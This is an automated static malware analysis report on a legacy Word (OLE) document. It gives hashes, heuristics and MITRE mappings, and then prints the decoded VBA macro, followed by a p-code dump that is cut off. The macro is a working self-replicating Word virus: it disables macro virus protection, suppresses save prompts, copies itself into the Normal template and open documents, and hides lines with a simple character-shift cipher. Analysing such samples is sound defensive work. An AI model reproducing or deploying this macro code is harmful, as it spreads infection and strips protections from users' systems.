Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 68ca81425cc44116…

MALICIOUS

Office (OLE)

43.0 KB Created: 2001-08-03 12:06:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d923213897ff0a5ef655bfcad3cc4af8 SHA-1: ee6c51190ccca7832298318cc4fcbd1eeecbc21d SHA-256: 68ca81425cc4411653e22765c5f3b9e6101f76c5df898637fe4f2b9620c1567b
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes upon document opening, indicated by the 'document_open' subroutine and 'OLE_VBA_DOCOPEN' heuristic. The macro appears to be designed to obfuscate and potentially download additional content, as suggested by the 'dekrip' and 'enkrip' calls and the manipulation of template code. The presence of a legacy WordBasic auto-exec marker ('AutoOpen') further supports macro execution. The email address 'rio96@student.te.ugm.ac.id' was found within the script, which could be an indicator of the actor.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 44,032 bytes but its declared streams total only 22,687 bytes — 21,345 bytes (48%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11421 bytes
SHA-256: ef36ebf225317ddf0f5f4b8851c5da115477bde2813361cfc70e7a43d05d1930
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Const BOK = "Rio&Umi 4ever together"
'Read
Private Sub document_open()
  Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
  Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
  Set Thi = ThisDocument.VBProject.VBComponents(1).CodeModule
  ADi = AD.Find(BOK, 1, 1, 100, 100)
  NTi = NT.Find(BOK, 1, 1, 100, 100)
 
  If (ADi = True And NTi = True) Then
    GoTo finish
  End If
  If Thi.lines(2, 1) = "'Unread" Then
    Call dekrip
  ElseIf Thi.lines(2, 1) = "'Read" Then
    GoTo finish
  End If
Application.Caption = "Rio&Umi 4ever together"


finish:
End Sub


Private Sub document_close()
On Error GoTo finish
  Options.VirusProtection = False
  Options.SaveNormalPrompt = False
  Application.UserName = "Rio&Umi 4ever together"
  Application.UserAddress = "rio96@student.te.ugm.ac.id"
  Application.UserInitials = "Rio"
  Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
  Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
  Set Thi = ThisDocument.VBProject.VBComponents(1).CodeModule
  ADi = AD.Find(BOK, 1, 1, 100, 100)
  NTi = NT.Find(BOK, 1, 1, 100, 100)
  
  If (ADi = True And NTi = True) Then
    GoTo finish
  End If
  If Thi.lines(2, 1) = "'Read" Then
    Call enkrip
  ElseIf Thi.lines(2, 1) = "'Unread" Then
    GoTo finish
  End If
  
  If (ADi = True And NTi = False) Then
    SAVIT = NormalTemplate.Saved
    NT.deletelines 1, NT.Countoflines
    codde = Thi.lines(1, Thi.Countoflines)
    NT.addfromstring codde
    Rem If savit Then NormalTemplate.Save
  ElseIf (ADi = False And NTi = True) Then
    SAVIT = ActiveDocument.Saved
    AD.deletelines 1, AD.Countoflines
    codde = Thi.lines(1, Thi.Countoflines)
     AD.addfromstring codde
    If SAVIT Then ActiveDocument.Save
  End If
  
ActiveDocument.Save
finish:


ActiveDocument.Save

End Sub

Private Sub enkrip()
Dim test1 As String
   
    'JumLine = ThisDocument.VBProject.VBComponents(1).CodeModule.Countoflines
    For i = 46 To 59
        test1 = "'"
        Line = ThisDocument.VBProject.VBComponents(1).CodeModule.lines(i, 1)
        panbar = Len(Line)
        For t = 1 To panbar
            Kar = Mid$(Line, t, 1)
            test1 = test1 + (Chr(Asc(Kar) + 12))
        Next
    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine i, test1
    test1 = "'"
    Next
    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine 2, "'Unread"
End Sub

Private Sub dekrip()
Dim test1 As String
    
    'JumLine = ActiveDocument.VBProject.VBComponents(1).CodeModule.Countoflines
    For i = 46 To 59
        test1 = ""
        Line = ThisDocument.VBProject.VBComponents(1).CodeModule.lines(i, 1)
        panbar = Len(Line)
        For t = 2 To panbar
            Kar = Mid$(Line, t, 1)
            test1 = test1 + (Chr(Asc(Kar) - 12))
        Next
    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine i, test1
    test1 = ""
    Next
    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine 2, "'Read"
End Sub


' Processing file: /opt/analyzer/scan_staging/1e82da8e586d42a5bc56eb80a1ab3720.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5798 bytes
' Line #0:
' Line #1:
' 	Dim (Const) 
' 	LitStr 0x0016 "Rio&Umi 4ever together"
' 	VarDefn BOK
' Line #2:
' 	QuoteRem 0x0000 0x0004 "Read"
' Line #3:
' 	FuncDefn (Private Sub document_open())
' Line #4:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set AD 
' Line #5:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NT 
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ThisDocume
... (truncated)